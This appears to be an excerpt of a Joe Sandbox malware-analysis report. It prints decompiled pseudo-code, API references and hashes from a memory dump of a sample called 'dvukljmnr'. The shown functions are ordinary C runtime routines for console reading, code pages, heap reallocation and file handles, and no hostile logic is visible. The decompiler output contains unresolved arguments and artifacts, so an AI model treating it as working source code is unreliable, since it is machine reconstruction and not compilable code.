                                                          													_t302 =  *((char*)(( *_t422 & 0x000000ff) + 0x9ce408));
                                                          													__eflags = _t302;
                                                          													if(_t302 != 0) {
                                                          														__eflags = _t302 + 1 - _t396;
                                                          														if(_t302 + 1 != _t396) {
                                                          															_t378 =  *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4));
                                                          															__eflags =  *(_t378 + _t355 + 4) & 0x00000048;
                                                          															if(__eflags == 0) {
                                                          																asm("cdq");
                                                          																E009B3F56(_t378, __eflags,  *((intOrPtr*)(_t426 + 8)),  ~_t396,  ~_t396, 1);
                                                          															} else {
                                                          																_t424 =  &(_t422[1]);
                                                          																 *((char*)(_t378 + _t355 + 5)) =  *_t422;
                                                          																_t313 =  *(_t426 - 0xc);
                                                          																__eflags = _t396 - 2;
                                                          																if(_t396 >= 2) {
                                                          																	_t315 =  *_t424;
                                                          																	_t424 = _t424 + 1;
                                                          																	__eflags = _t424;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x25)) = _t315;
                                                          																	_t313 =  *(_t426 - 0xc);
                                                          																}
                                                          																__eflags = _t396 - 3;
                                                          																if(_t396 == 3) {
                                                          																	_t314 =  *_t424;
                                                          																	_t424 = _t424 + 1;
                                                          																	__eflags = _t424;
                                                          																	 *((char*)( *((intOrPtr*)(0x9cf230 + _t313 * 4)) + _t355 + 0x26)) = _t314;
                                                          																}
                                                          																_t422 = _t424 - _t396;
                                                          															}
                                                          														} else {
                                                          															_t422 =  &(_t422[_t396]);
                                                          														}
                                                          														L96:
                                                          														_t412 =  *(_t426 - 0x10);
                                                          														_t423 = _t422 - _t412;
                                                          														_t403 = MultiByteToWideChar(0xfde9, 0, _t412, _t423,  *(_t426 + 0xc),  *(_t426 - 0x28) >> 1);
                                                          														__eflags = _t403;
                                                          														if(_t403 == 0) {
                                                          															goto L29;
                                                          														}
                                                          														__eflags = _t403 - _t423;
                                                          														_t380 = 0 | _t403 != _t423;
                                                          														_t403 = _t403 + _t403;
                                                          														__eflags = _t403;
                                                          														 *( *((intOrPtr*)(0x9cf230 +  *(_t426 - 0xc) * 4)) + _t355 + 0x30) = _t380;
                                                          														goto L98;
                                                          													}
                                                          													 *((intOrPtr*)(E009AF100())) = 0x2a;
                                                          													L31:
                                                          													_t357 = _t355 | 0xffffffff;
                                                          													L32:
                                                          													_t261 =  *(_t426 - 0x10);
                                                          													goto L101;
                                                          												}
                                                          												_t358 =  *(_t426 - 0x10);
                                                          												while(1) {
                                                          													__eflags = _t396 - 4;
                                                          													if(_t396 > 4) {
                                                          														break;
                                                          													}
                                                          													__eflags = _t422 - _t358;
                                                          													if(_t422 < _t358) {
                                                          														break;
                                                          													}
                                                          													_t422 = _t422 - 1;
                                                          													_t396 = _t396 + 1;
                                                          													_t317 =  *_t422 & 0x000000ff;
                                                          													__eflags =  *((char*)(_t317 + 0x9ce408));
                                                          													if( *((char*)(_t317 + 0x9ce408)) == 0) {
                                                          														continue;
                                                          													}
                                                          													break;
                                                          												}
                                                          												_t355 =  *(_t426 - 0x24);
                                                          												goto L85;
                                                          											}
                                                          											_t422 =  &(_t422[1]);
                                                          											goto L96;
                                                          										}
                                                          										_t383 = 0xd;
                                                          										_t413 = _t298;
                                                          										while(1) {
                                                          											_t318 =  *_t413;
                                                          											__eflags = _t318 - 0x1a;
                                                          											if(_t318 == 0x1a) {
                                                          												break;
                                                          											}
                                                          											__eflags = _t318 - _t383;
                                                          											if(_t318 == _t383) {
                                                          												__eflags = _t413 -  *(_t426 - 0x1c) - 1;
                                                          												if(_t413 >=  *(_t426 - 0x1c) - 1) {
                                                          													_push(0);
                                                          													_t413 = _t413 + 1;
                                                          													__eflags = _t413;
                                                          													_push(_t426 - 0x14);
                                                          													_push(1);
                                                          													 *((intOrPtr*)(_t426 - 0x74af00bb)) =  *((intOrPtr*)(_t426 - 0x74af00bb)) + _t383;
                                                          													asm("pushfd");
                                                          													_t355 = _t355 + _t355;
                                                          													_t327 = ReadFile(??, ??, ??, ??, ??);
                                                          													__eflags = _t327;
                                                          													if(_t327 != 0) {
                                                          														L56:
                                                          														__eflags =  *(_t426 - 0x14);
                                                          														if( *(_t426 - 0x14) == 0) {
                                                          															goto L71;
                                                          														}
                                                          														_t391 =  *(_t426 - 0xc);
                                                          														_t328 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          														__eflags =  *(_t328 + _t355 + 4) & 0x00000048;
                                                          														if(( *(_t328 + _t355 + 4) & 0x00000048) == 0) {
                                                          															__eflags = _t421 -  *(_t426 - 0x10);
                                                          															if(__eflags != 0) {
                                                          																L68:
                                                          																E009B3F56(_t383, __eflags,  *((intOrPtr*)(_t426 + 8)), 0xffffffff, 0xffffffff, 1);
                                                          																_t391 =  *(_t426 - 0xc);
                                                          																_t428 = _t428 + 0x10;
                                                          																_t330 = 0xa;
                                                          																__eflags =  *((intOrPtr*)(_t426 - 1)) - _t330;
                                                          																if( *((intOrPtr*)(_t426 - 1)) == _t330) {
                                                          																	L64:
                                                          																	_push(0xd);
                                                          																	L65:
                                                          																	_pop(_t383);
                                                          																	goto L66;
                                                          																}
                                                          																_t383 = 0xd;
                                                          																 *_t421 = _t383;
                                                          																L70:
                                                          																_t421 = _t421 + 1;
                                                          																goto L66;
                                                          															}
                                                          															_t331 = 0xa;
                                                          															__eflags =  *((intOrPtr*)(_t426 - 1)) - _t331;
                                                          															if(__eflags != 0) {
                                                          																goto L68;
                                                          															}
                                                          															 *_t421 = _t331;
                                                          															_t421 = _t421 + 1;
                                                          															__eflags = _t421;
                                                          															goto L64;
                                                          														}
                                                          														_t332 = 0xa;
                                                          														_push(0xd);
                                                          														__eflags =  *((intOrPtr*)(_t426 - 1)) - _t332;
                                                          														if( *((intOrPtr*)(_t426 - 1)) != _t332) {
                                                          															 *_t421 = 0xd;
                                                          															_t421 = _t421 + 1;
                                                          															 *((char*)( *((intOrPtr*)(0x9cf230 + _t391 * 4)) + _t355 + 5)) =  *((intOrPtr*)(_t426 - 1));
                                                          														} else {
                                                          															 *_t421 = _t332;
                                                          															_t421 = _t421 + 1;
                                                          														}
                                                          														goto L65;
                                                          													} else {
                                                          														_t334 = GetLastError();
                                                          														__eflags = _t334;
                                                          														if(_t334 != 0) {
                                                          															L71:
                                                          															_t391 =  *(_t426 - 0xc);
                                                          															_t383 = 0xd;
                                                          															 *_t421 = _t383;
                                                          															_t421 = _t421 + 1;
                                                          															L66:
                                                          															__eflags = _t413 -  *(_t426 - 0x1c);
                                                          															if(_t413 <  *(_t426 - 0x1c)) {
                                                          																continue;
                                                          															}
                                                          															goto L75;
                                                          														}
                                                          														goto L56;
                                                          													}
                                                          												}
                                                          												_t98 = _t413 + 1; // 0x9b2b48
                                                          												_t335 = _t98;
                                                          												__eflags =  *_t335 - 0xa;
                                                          												if( *_t335 != 0xa) {
                                                          													 *_t421 = _t383;
                                                          													_t413 = _t335;
                                                          													_t421 = _t421 + 1;
                                                          													goto L66;
                                                          												}
                                                          												_t336 = 0xa;
                                                          												_t413 = _t413 + 2;
                                                          												 *_t421 = _t336;
                                                          												goto L70;
                                                          											}
                                                          											 *_t421 = _t318;
                                                          											_t421 = _t421 + 1;
                                                          											_t413 = _t413 + 1;
                                                          											goto L66;
                                                          										}
                                                          										_t384 =  *((intOrPtr*)(0x9cf230 + _t391 * 4));
                                                          										_t319 =  *(_t384 + _t355 + 4);
                                                          										__eflags = _t319 & 0x00000040;
                                                          										if((_t319 & 0x00000040) != 0) {
                                                          											 *_t421 =  *_t413;
                                                          											_t421 = _t421 + 1;
                                                          											__eflags = _t421;
                                                          										} else {
                                                          											 *(_t384 + _t355 + 4) = _t319 | 0x00000002;
                                                          										}
                                                          										goto L75;
                                                          									}
                                                          									__eflags =  *( *(_t426 - 0x10)) - 0xa;
                                                          									if( *( *(_t426 - 0x10)) != 0xa) {
                                                          										goto L43;
                                                          									}
                                                          									_t297 = _t265 | 0x00000004;
                                                          									goto L44;
                                                          								}
                                                          								L29:
                                                          								_t259 = GetLastError();
                                                          								L30:
                                                          								E009AF0DF(_t259);
                                                          								goto L31;
                                                          							}
                                                          						}
                                                          					}
                                                          					if(( !__esi & 0x00000001) == 0) {
                                                          						L2:
                                                          						 *(E009AF0CC()) =  *_t248 & _t403;
                                                          						 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						_t250 = E009AEB1E();
                                                          						L162:
                                                          						_t251 = _t250 | 0xffffffff;
                                                          						__eflags = _t251;
                                                          						goto L163;
                                                          					} else {
                                                          						_t415 = __esi & 0xfffffffe;
                                                          						goto L7;
                                                          					}
                                                          				}
                                                          			}
                                                          0x009afd8b
                                                          0x009afd8e
                                                          0x009afd92
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd94
                                                          0x009afd97
                                                          0x009afda7
                                                          0x009afda9
                                                          0x009afdab
                                                          0x009afdb0
                                                          0x009afdb1
                                                          0x009afdb4
                                                          0x009afdb8
                                                          0x009afdba
                                                          0x009afdba
                                                          0x009afdbb
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afdbe
                                                          0x009afd99
                                                          0x009afd99
                                                          0x009afd9c
                                                          0x009afd9f
                                                          0x009afd9f
                                                          0x009afdc1
                                                          0x009afdc3
                                                          0x00000000
                                                          0x009afdc5
                                                          0x00000000
                                                          0x009afdc5
                                                          0x009afdc3
                                                          0x009afdca
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x009afdd1
                                                          0x00000000
                                                          0x009afdd1
                                                          0x009afaf9
                                                          0x009afafb
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb09
                                                          0x009afb0b
                                                          0x009afb0b
                                                          0x009afb0f
                                                          0x009afb12
                                                          0x009afb14
                                                          0x009afb17
                                                          0x009afb1a
                                                          0x009afb1d
                                                          0x009afb1f
                                                          0x009afc33
                                                          0x009afc33
                                                          0x009afc38
                                                          0x009afc3a
                                                          0x009afc3e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc44
                                                          0x009afc46
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc4c
                                                          0x009afc4d
                                                          0x009afc4f
                                                          0x009afc51
                                                          0x009afc59
                                                          0x009afc5e
                                                          0x009afc5f
                                                          0x009afc66
                                                          0x009afc85
                                                          0x009afc88
                                                          0x009afc8f
                                                          0x009afc91
                                                          0x009afca4
                                                          0x009afca6
                                                          0x009afcaf
                                                          0x009afcb6
                                                          0x009afcbb
                                                          0x009afcfa
                                                          0x009afd00
                                                          0x009afcbd
                                                          0x009afcbf
                                                          0x009afcc0
                                                          0x009afcc4
                                                          0x009afcc7
                                                          0x009afcca
                                                          0x009afcd3
                                                          0x009afcd5
                                                          0x009afcd5
                                                          0x009afcd6
                                                          0x009afcda
                                                          0x009afcda
                                                          0x009afcdd
                                                          0x009afce0
                                                          0x009afce9
                                                          0x009afceb
                                                          0x009afceb
                                                          0x009afcec
                                                          0x009afcec
                                                          0x009afcf0
                                                          0x009afcf0
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afca8
                                                          0x009afd08
                                                          0x009afd0b
                                                          0x009afd0e
                                                          0x009afd25
                                                          0x009afd27
                                                          0x009afd29
                                                          0x00000000
                                                          0x00000000
                                                          0x009afd34
                                                          0x009afd36
                                                          0x009afd39
                                                          0x009afd39
                                                          0x009afd42
                                                          0x00000000
                                                          0x009afd42
                                                          0x009afc98
                                                          0x009afa89
                                                          0x009afa89
                                                          0x009afa8c
                                                          0x009afa8c
                                                          0x00000000
                                                          0x009afa8c
                                                          0x009afc68
                                                          0x009afc6b
                                                          0x009afc6b
                                                          0x009afc6e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc70
                                                          0x009afc72
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc74
                                                          0x009afc75
                                                          0x009afc76
                                                          0x009afc79
                                                          0x009afc80
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afc80
                                                          0x009afc82
                                                          0x00000000
                                                          0x009afc82
                                                          0x009afc53
                                                          0x00000000
                                                          0x009afc53
                                                          0x009afb27
                                                          0x009afb28
                                                          0x009afb2a
                                                          0x009afb2a
                                                          0x009afb2c
                                                          0x009afb2e
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb34
                                                          0x009afb36
                                                          0x009afb45
                                                          0x009afb47
                                                          0x009afb65
                                                          0x009afb6a
                                                          0x009afb6a
                                                          0x009afb6b
                                                          0x009afb6c
                                                          0x009afb6d
                                                          0x009afb77
                                                          0x009afb78
                                                          0x009afb7c
                                                          0x009afb82
                                                          0x009afb84
                                                          0x009afb90
                                                          0x009afb90
                                                          0x009afb94
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb96
                                                          0x009afb99
                                                          0x009afba0
                                                          0x009afba5
                                                          0x009afbca
                                                          0x009afbcd
                                                          0x009afbe8
                                                          0x009afbf1
                                                          0x009afbf6
                                                          0x009afbf9
                                                          0x009afbfe
                                                          0x009afbff
                                                          0x009afc02
                                                          0x009afbda
                                                          0x009afbda
                                                          0x009afbdc
                                                          0x009afbdc
                                                          0x00000000
                                                          0x009afbdc
                                                          0x009afc06
                                                          0x009afc07
                                                          0x009afc09
                                                          0x009afc09
                                                          0x00000000
                                                          0x009afc09
                                                          0x009afbd1
                                                          0x009afbd2
                                                          0x009afbd5
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbd7
                                                          0x009afbd9
                                                          0x009afbd9
                                                          0x00000000
                                                          0x009afbd9
                                                          0x009afba9
                                                          0x009afbaa
                                                          0x009afbac
                                                          0x009afbaf
                                                          0x009afbb6
                                                          0x009afbb9
                                                          0x009afbc4
                                                          0x009afbb1
                                                          0x009afbb1
                                                          0x009afbb3
                                                          0x009afbb3
                                                          0x00000000
                                                          0x009afb86
                                                          0x009afb86
                                                          0x009afb8c
                                                          0x009afb8e
                                                          0x009afc0c
                                                          0x009afc0c
                                                          0x009afc11
                                                          0x009afc12
                                                          0x009afc14
                                                          0x009afbdd
                                                          0x009afbdd
                                                          0x009afbe0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x009afbe6
                                                          0x00000000
                                                          0x009afb8e
                                                          0x009afb84
                                                          0x009afb49
                                                          0x009afb49
                                                          0x009afb4c
                                                          0x009afb4f
                                                          0x009afb5e
                                                          0x009afb60
                                                          0x009afb62
                                                          0x00000000
                                                          0x009afb62
                                                          0x009afb53
                                                          0x009afb54
                                                          0x009afb57
                                                          0x00000000
                                                          0x009afb57
                                                          0x009afb38
                                                          0x009afb3a
                                                          0x009afb3b
                                                          0x00000000
                                                          0x009afb3b
                                                          0x009afc17
                                                          0x009afc1e
                                                          0x009afc22
                                                          0x009afc24
                                                          0x009afc30
                                                          0x009afc32
                                                          0x009afc32
                                                          0x009afc26
                                                          0x009afc28
                                                          0x009afc28
                                                          0x00000000
                                                          0x009afc24
                                                          0x009afb00
                                                          0x009afb03
                                                          0x00000000
                                                          0x00000000
                                                          0x009afb05
                                                          0x00000000
                                                          0x009afb05
                                                          0x009afa7c
                                                          0x009afa7c
                                                          0x009afa82
                                                          0x009afa83
                                                          0x00000000
                                                          0x009afa88
                                                          0x009afa51
                                                          0x009afa2f
                                                          0x009af913
                                                          0x009af8f0
                                                          0x009af8f5
                                                          0x009af8d0
                                                          0x009affcc
                                                          0x009affd1
                                                          0x009affd1
                                                          0x009affd1
                                                          0x00000000
                                                          0x009af915
                                                          0x009af915
                                                          0x00000000
                                                          0x009af915
                                                          0x009af913

                                                          APIs
                                                          • __malloc_crt.LIBCMT ref: 009AF933
                                                          • GetConsoleMode.KERNEL32 ref: 009AFA46
                                                          • ReadConsoleW.KERNEL32(?,?,009B2B47,?,00000000), ref: 009AFA72
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,009B2B47,?), ref: 009AFA7C
                                                          • __dosmaperr.LIBCMT ref: 009AFA83
                                                          • _free.LIBCMT ref: 009AFD52
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                                                          • String ID:
                                                          • API String ID: 3470617983-0
                                                          • Opcode ID: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction ID: 992db9ccb05113db84f02c962f3552eadaae0e2fcbb6f8b591836f2c90ec76f2
                                                          • Opcode Fuzzy Hash: dde42d1e8063dcc5eb365c9e08b65814938f7a47c5e62747a1ea620129d83373
                                                          • Instruction Fuzzy Hash: 2141EA70E146858ECB26CFDC9C64BE9BBA9AB47314F054175EC588B2A2D730CD0AC7D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E009A6AE8(void* __ebx, signed int __edx) {
                                                          				intOrPtr _t43;
                                                          				void* _t55;
                                                          				signed int _t69;
                                                          				signed int _t70;
                                                          				signed int _t75;
                                                          				intOrPtr _t77;
                                                          				signed int _t82;
                                                          				void* _t83;
                                                          
                                                          				_t75 = __edx;
                                                          				_t61 = __ebx;
                                                          				_t86 = __ebx;
                                                          				if(__ebx == 0) {
                                                          					L24:
                                                          					return E009AF225(_t77);
                                                          				} else {
                                                          					memcpy(__ebx,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68), 0x88 << 2);
                                                          					_t82 = 0;
                                                          					 *__ebx = 0;
                                                          					_t77 = E009B48E9(_t75,  *( *((intOrPtr*)(_t83 - 0x20)) + 0x68) + 0x110, _t86,  *((intOrPtr*)(_t83 + 8)), __ebx);
                                                          					 *((intOrPtr*)(_t83 + 8)) = _t77;
                                                          					if(_t77 != 0) {
                                                          						__eflags = _t77 - 0xffffffff;
                                                          						if(_t77 == 0xffffffff) {
                                                          							__eflags = __ebx - 0x9ceac8;
                                                          							if(__ebx != 0x9ceac8) {
                                                          								E009B2248(__ebx);
                                                          							}
                                                          							 *((intOrPtr*)(E009AF100())) = 0x16;
                                                          						}
                                                          						goto L24;
                                                          					}
                                                          					_t43 =  *((intOrPtr*)(_t83 - 0x20));
                                                          					asm("lock xadd [ecx], edx");
                                                          					if((_t75 | 0xffffffff) == 0) {
                                                          						_t73 =  *(_t43 + 0x68);
                                                          						if( *(_t43 + 0x68) != 0x9ceac8) {
                                                          							E009B2248(_t73);
                                                          							_t43 =  *((intOrPtr*)(_t83 - 0x20));
                                                          						}
                                                          					}
                                                          					 *(_t43 + 0x68) = _t61;
                                                          					asm("lock xadd [ebx], eax");
                                                          					if(( *( *((intOrPtr*)(_t83 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0x9cee10 & 0x00000001) == 0) {
                                                          						E009B20A9(0xd);
                                                          						 *(_t83 - 4) = _t82;
                                                          						 *0x9cfcd4 =  *((intOrPtr*)(_t61 + 4));
                                                          						 *0x9cfcd8 =  *((intOrPtr*)(_t61 + 8));
                                                          						 *0x9cfce8 =  *((intOrPtr*)(_t61 + 0x21c));
                                                          						_t69 = _t82;
                                                          						while(1) {
                                                          							 *(_t83 - 0x1c) = _t69;
                                                          							if(_t69 >= 5) {
                                                          								break;
                                                          							}
                                                          							 *((short*)(0x9cfcdc + _t69 * 2)) =  *((intOrPtr*)(_t61 + 0xc + _t69 * 2));
                                                          							_t69 = _t69 + 1;
                                                          						}
                                                          						_t70 = _t82;
                                                          						while(1) {
                                                          							 *(_t83 - 0x1c) = _t70;
                                                          							__eflags = _t70 - 0x101;
                                                          							if(_t70 >= 0x101) {
                                                          								goto L14;
                                                          							}
                                                          							 *((char*)(_t70 + 0x9ce8c0)) =  *((intOrPtr*)(_t70 + _t61 + 0x18));
                                                          							_t70 = _t70 + 1;
                                                          						}
                                                          						while(1) {
                                                          							L14:
                                                          							 *(_t83 - 0x1c) = _t82;
                                                          							__eflags = _t82 - 0x100;
                                                          							if(_t82 >= 0x100) {
                                                          								break;
                                                          							}
                                                          							 *((char*)(_t82 + 0x9ce9c8)) =  *((intOrPtr*)(_t82 + _t61 + 0x119));
                                                          							_t82 = _t82 + 1;
                                                          						}
                                                          						__eflags = _t70 | 0xffffffff;
                                                          						asm("lock xadd [eax], ecx");
                                                          						if((_t70 | 0xffffffff) == 0) {
                                                          							_t55 =  *0x9cecec; // 0x9ceac8
                                                          							__eflags = _t55 - 0x9ceac8;
                                                          							if(_t55 != 0x9ceac8) {
                                                          								E009B2248(_t55);
                                                          							}
                                                          						}
                                                          						 *0x9cecec = _t61;
                                                          						asm("lock xadd [ebx], eax");
                                                          						 *(_t83 - 4) = 0xfffffffe;
                                                          						E009B48B3();
                                                          					}
                                                          					goto L24;
                                                          				}
                                                          			}












                                                          APIs
                                                          • __setmbcp_nolock.LIBCMT ref: 009B47A3
                                                            • Part of subcall function 009B48E9: getSystemCP.LIBCMT ref: 009B4901
                                                            • Part of subcall function 009B48E9: setSBCS.LIBCMT ref: 009B490E
                                                          • _free.LIBCMT ref: 009B47D2
                                                            • Part of subcall function 009B2248: HeapFree.KERNEL32(00000000,00000000), ref: 009B225C
                                                            • Part of subcall function 009B2248: GetLastError.KERNEL32(00000000,?,009B060D,00000000,?,009CE000), ref: 009B226E
                                                          • __lock.LIBCMT ref: 009B4801
                                                          • _free.LIBCMT ref: 009B488F
                                                          • _free.LIBCMT ref: 009B48CC
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLastSystem__lock__setmbcp_nolock
                                                          • String ID:
                                                          • API String ID: 2025676541-0
                                                          • Opcode ID: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction ID: 15082d5e1f2e5f5613b2308eabd6146c6695541089bec513520f9c58288ead37
                                                          • Opcode Fuzzy Hash: 892a9b0d980b05250adc93d2c362be02ae8a97b95cea822657832b982ed6507f
                                                          • Instruction Fuzzy Hash: 2F41F574D542848FDB15DF68D9C0BE877E8FB45330B24416DE8669B693CB388C42EB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E009B6902(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                          				void* _t7;
                                                          				void* _t8;
                                                          				intOrPtr* _t9;
                                                          				intOrPtr* _t12;
                                                          				void* _t20;
                                                          				long _t31;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t31 = _a8;
                                                          					if(_t31 != 0) {
                                                          						_push(__ebx);
                                                          						while(_t31 <= 0xffffffe0) {
                                                          							if(_t31 == 0) {
                                                          								_t31 = _t31 + 1;
                                                          							}
                                                          							_t7 = HeapReAlloc( *0x9cf22c, 0, _a4, _t31);
                                                          							_t20 = _t7;
                                                          							if(_t20 != 0) {
                                                          								L17:
                                                          								_t8 = _t20;
                                                          							} else {
                                                          								if( *0x9d0060 == _t7) {
                                                          									_t9 = E009AF100();
                                                          									 *_t9 = E009AF159(GetLastError());
                                                          									goto L17;
                                                          								} else {
                                                          									if(E009B4C7E(_t7, _t31) == 0) {
                                                          										_t12 = E009AF100();
                                                          										 *_t12 = E009AF159(GetLastError());
                                                          										L12:
                                                          										_t8 = 0;
                                                          									} else {
                                                          										continue;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          						E009B4C7E(_t6, _t31);
                                                          						 *((intOrPtr*)(E009AF100())) = 0xc;
                                                          						goto L12;
                                                          					} else {
                                                          						E009B2248(_a4);
                                                          						_t8 = 0;
                                                          					}
                                                          					L14:
                                                          					return _t8;
                                                          				} else {
                                                          					return E009B6870(__ebx, __edx, __edi, _a8);
                                                          				}
                                                          			}










                                                          APIs
                                                          • _malloc.LIBCMT ref: 009B690E
                                                            • Part of subcall function 009B6870: __FF_MSGBANNER.LIBCMT ref: 009B6887
                                                            • Part of subcall function 009B6870: __NMSG_WRITE.LIBCMT ref: 009B688E
                                                            • Part of subcall function 009B6870: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,009B22DE,00000000,00000000,00000000,00000000,?,009B2193,00000018,009CC228), ref: 009B68B3
                                                          • _free.LIBCMT ref: 009B6921
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.984061455.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000006.00000002.984056146.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984081506.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984089779.00000000009CE000.00000008.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000006.00000002.984095965.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AllocHeap_free_malloc
                                                          • String ID:
                                                          • API String ID: 2734353464-0
                                                          • Opcode ID: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction ID: 580ec1b5ae87a2f4d2080605421722227a8d25995727818da3d88966004fae7a
                                                          • Opcode Fuzzy Hash: 1c5b241c96fe85e4035ba39a9651c938ae6608e1e921a3bc85767cb8b7f9a249
                                                          • Instruction Fuzzy Hash: B811C63281D215EFCB212FB0EE147EA3B98AF453B0F204539F949DA161DB38A84096D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E009A6016(signed char __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				long _t30;
                                                          				signed int _t37;
                                                          				signed int _t40;
                                                          				signed int _t48;
                                                          				void* _t50;
                                                          				signed int _t52;
                                                          				void* _t53;
                                                          				void* _t56;
                                                          				signed int _t57;
                                                          				void* _t58;
                                                          
                                                          				_t56 = __esi;
                                                          				_t53 = __edi;
                                                          				_t50 = __edx;
                                                          				_t42 = __ebx;
                                                          				if(__eflags != 0) {
                                                          					_t42 = __ebx + 0x20;
                                                          				}
                                                          				if(( *(_t58 + 0xc) & 0x00004000) != 0) {
                                                          					_t42 = _t42 | 0x00000080;
                                                          				}
                                                          				if(( *(_t58 + 0xc) & 0x00000080) != 0) {
                                                          					_t42 = _t42 | 0x00000010;
                                                          				}
                                                          				_t30 = GetFileType( *(_t58 + 8));
                                                          				if(_t30 != 0) {
                                                          					__eflags = _t30 - 2;
                                                          					if(__eflags != 0) {
                                                          						__eflags = _t30 - 3;
                                                          						if(__eflags == 0) {
                                                          							_t42 = _t42 | 0x00000008;
                                                          							__eflags = _t42;
                                                          						}
                                                          					} else {
                                                          						_t42 = _t42 | 0x00000040;
                                                          					}
                                                          					_t57 = E009B3A06(_t42, _t50, _t53, _t56, __eflags);
                                                          					 *(_t58 + 0xc) = _t57;
                                                          					__eflags = _t57 - 0xffffffff;
                                                          					if(_t57 != 0xffffffff) {
                                                          						 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                          						E009B3DB2(_t57,  *(_t58 + 8));
                                                          						_t52 = _t57 >> 5;
                                                          						_t48 = (_t57 & 0x0000001f) << 6;
                                                          						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 4) = _t42 | 0x00000001;
                                                          						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x00000080;
                                                          						 *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) =  *(_t48 +  *((intOrPtr*)(0x9cf230 + _t52 * 4)) + 0x24) & 0x0000007f;
                                                          						 *((intOrPtr*)(_t58 - 0x1c)) = 1;
                                                          						 *(_t58 - 4) = 0xfffffffe;
                                                          						E009B3D8D(1, _t57);
                                                          						__eflags = 1;
                                                          						if(1 == 0) {
                                                          							_t57 = _t57 | 0xffffffff;
                                                          							__eflags = _t57;
                                                          						}
                                                          						_t37 = _t57;
                                                          					} else {
                                                          						 *((intOrPtr*)(E009AF100())) = 0x18;
                                                          						_t40 = E009AF0CC();
                                                          						 *_t40 =  *_t40 & 0x00000000;
                                                          						goto L9;
                                                          					}
                                                          				} else {
                                                          					_t40 = E009AF0DF(GetLastError());
                                                          					L9:
                                                          					_t37 = _t40 | 0xffffffff;
                                                          				}
                                                          				return E009AF225(_t37);
                                                          			}














                                                          APIs
                                                          Memory Dump Source
